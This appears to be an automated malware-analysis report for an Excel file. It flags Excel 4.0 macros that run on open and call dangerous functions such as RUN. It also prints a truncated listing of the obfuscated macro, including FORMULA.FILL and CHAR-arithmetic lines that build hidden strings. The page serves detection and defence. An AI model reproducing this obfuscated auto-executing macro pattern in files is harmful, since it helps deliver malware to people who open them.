MALICIOUS
140
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The critical heuristics indicate the presence of Excel 4.0 macros with an Auto_Open entry, which is configured to use dangerous functions like RUN. This strongly suggests the macro is designed to execute a secondary payload. The specific dangerous functions identified are RUN and a formula API, pointing towards an attempt to achieve arbitrary code execution.
Heuristics 3
-
Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAMEoletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
-
XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FNExcel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
-
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPENWorkbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
xlm_macros.txt |
xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 126953 bytes |
SHA-256: 962dcb4eecb3f1998335870a460cf7053244881cc7cbcb53be7bdbfc6235396c |
|||
Preview scriptFirst 1,000 lines of the extracted script
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet ' 0085 14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - Sheet ' 0018 28 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open hidden len=7 ptgRef3d Sheet!BS10827 ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' Sheet,Reference,Formula,Value ' Sheet,DG61,"",2623.00000000000000000000 ' Sheet,FE160,"",-422.00000000000000000000 ' Sheet,M161,"",-518.00000000000000000000 ' Sheet,JU185,"",2622.00000000000000000000 ' Sheet,GW290,"",-0.01929133858267716509 ' Sheet,GO345,"",-1.48000122070312500888 ' Sheet,BD352,"",1.24324324324324320123 ' Sheet,HB355,"",0.55445544554455450381 ' Sheet,JT413,"",-0.74324324324324320123 ' Sheet,JO491,"",1.56140350877192979340 ' Sheet,L493,"",-489.00000000000000000000 ' Sheet,IS526,"",-518.00000000000000000000 ' Sheet,DE542,"",-30.00000000000000000000 ' Sheet,JM561,"",-298.00000000000000000000 ' Sheet,DL590,"",0.14754098360655737432 ' Sheet,JJ595,"",3.29629629629629627985 ' Sheet,EG621,"",8.60000488281250063949 ' Sheet,DM661,"",34.00000000000000000000 ' Sheet,CK666,"",2.52500122070312515987 ' Sheet,II668,"",0.68561872909698995393 ' Sheet,BL704,"",-336.00000000000000000000 ' Sheet,GO726,"",97.00000000000000000000 ' Sheet,BL759,"",-13.20000000000000284217 ' Sheet,FC767,"",69.00000000000000000000 ' Sheet,B825,"",314.00000000000000000000 ' Sheet,HH873,"",-2624.00000000000000000000 ' Sheet,D902,"",329.00000000000000000000 ' Sheet,IH990,"",-2601.00000000000000000000 ' Sheet,GW1053,"",-4.71739130434782616419 ' Sheet,DB1088,"",0.64301075268817198261 ' Sheet,BI1107,"",265.00000000000000000000 ' Sheet,EV1133,"",-1.73148148148148139924 ' Sheet,JI1193,"",-977.00000000000000000000 ' Sheet,EP1211,"",-125.12500000000000000000 ' Sheet,DW1254,"",1.50000000000000000000 ' Sheet,FJ1262,"",-1.35661764705882359472 ' Sheet,HP1342,"",-1278.50000000000000000000 ' Sheet,IG1368,"",0.19069767441860466239 ' Sheet,EN1378,"",1031.00000000000000000000 ' Sheet,HM1392,"",-30.97560975609756184213 ' Sheet,BD1442,"",274.00000000000000000000 ' Sheet,EO1457,"",-3.70940170940170954594 ' Sheet,IU1507,"",31.00000000000000000000 ' Sheet,BG1515,"",0.47524752475247522554 ' Sheet,JI1529,"",-0.95945945945945942945 ' Sheet,HD1541,"FORMULA.FILL(CHAR(EX35387-FF53317)&CHAR(CF59051*Q24460)&CHAR(JQ54801/BZ57161)&CHAR(EA50740-IF29556)&CHAR(CB64210+IA34879)&CHAR(EX35387-BK32238)&CHAR(JQ54801+BI19828)&CHAR(EX35387-BG2296)&CHAR(CB64210*EO34709)&CHAR(ER1140-X15298)&CHAR(JB33290/JB23647)&CHAR(IA52677/EC44210)&CHAR(CF59051*FI31932)&CHAR(ER1140*DZ54168)&CHAR(JB33290*JN24321)&CHAR(JB33290*JL53146)&CHAR(IA52677/IU46702)&CHAR(EA50740*CA9896)&CHAR(CB64210*HQ65406)&CHAR(FU27276/IH24629)&CHAR(CB64210/GG25697)&CHAR(JT43484+W25719)&CHAR(CF59051+IK53977)&CHAR(EX35387/B29872)&CHAR(ER1140-ER26461)&CHAR(IA52677/GN28599)&CHAR(JT43484-HB47632)&CHAR(CB64210-FC57443)&CHAR(JT43484+CB38387)&CHAR(IA52677/GQ9630)&CHAR(ER1140*BC33106)&CHAR(ER1140-EG2317)&CHAR(IA52677/JP50962)&CHAR(JB33290/JR59952)&CHAR(JT43484/CN21792)&CHAR(JB33290+HI41825),BX55816)","" ' Sheet,HD1542,GOTO(EY44141),"" ' Sheet,EU1564,"FORMULA.FILL(CHAR(ER1140*BU4981)&CHAR(JB33290*FA31385)&CHAR(IA52677+A32328)&CHAR(ER1140+EN54927)&CHAR(EX35387/JU32357)&CHAR(JQ54801*CI63102)&CHAR(FU27276/BF39391)&CHAR(EX35387-EP13116)&CHAR(EA50740-IV31248)&CHAR(EX35387/BI29103)&CHAR(CB64210+P18315)&CHAR(CB64210-CE27071)&CHAR(EX35387-JL20433)&CHAR(JQ54801+HU56579)&CHAR(IA52677-BD1442)&CHAR(EA50740/EH50338)&CHAR(IA52677-DV14029)&CHAR(FU27276+DY62523)&CHAR(CB64210-IP22152)&CHAR(IA52677-A42386)&CHAR(ER1140/M27755)&CHAR(JB33290+FM7404)&CHAR(FU27276+U52045)&CHAR(IA52677+GK46475),HV53012)","" ' Sheet,EU1565,GOTO(GG2583),"" ' Sheet,BL1589,"",213.00000000000000000000 ' Sheet,FC1612,"",2.14457831325301206959 ' Sheet,EW1629,"",-0.16322314049586778006 ' Sheet,EN1654,"",0.67326732673267331020 ' Sheet,GG1675,"",-0.07834101382488478649 ' Sheet,GD1698," ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.